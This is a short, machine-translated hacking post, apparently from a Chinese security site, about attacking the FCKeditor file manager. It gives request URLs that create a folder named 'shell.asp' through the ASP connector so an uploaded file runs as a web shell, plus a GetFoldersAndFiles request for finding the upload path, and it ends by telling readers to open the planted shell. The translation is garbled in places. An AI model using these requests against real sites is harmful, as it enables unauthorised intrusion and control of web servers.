FCKeditor upload vulnerability find upload path-vulnerability warning-the black bar safety net

ID MYHACK58:62201026914
Type myhack58
Reporter 佚名
Modified 2010-05-12T00:00:00


Online popular The is upload is like this

http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector. asp http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell. asp&NewFolderName=z&uuid=1 2 4 4 7 8 9 9 7 5 6 8 4

After upload the old path not found, measuring a bit, I found

FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector. asp? Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Can burst path, display the following content

! Draw the path, directly open it to see the chick!